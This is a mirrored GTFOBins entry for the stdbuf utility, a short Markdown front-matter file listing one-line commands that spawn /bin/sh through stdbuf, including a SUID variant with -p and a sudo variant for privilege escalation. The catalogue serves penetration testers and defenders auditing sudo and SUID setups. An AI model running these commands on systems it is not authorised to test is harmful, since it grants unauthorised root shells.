mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-02 13:41:39 +01:00
10 lines
147 B
Markdown
10 lines
147 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: stdbuf -i0 /bin/sh
|
|
suid:
|
|
- code: ./stdbuf -i0 /bin/sh -p
|
|
sudo:
|
|
- code: sudo stdbuf -i0 /bin/sh
|
|
---
|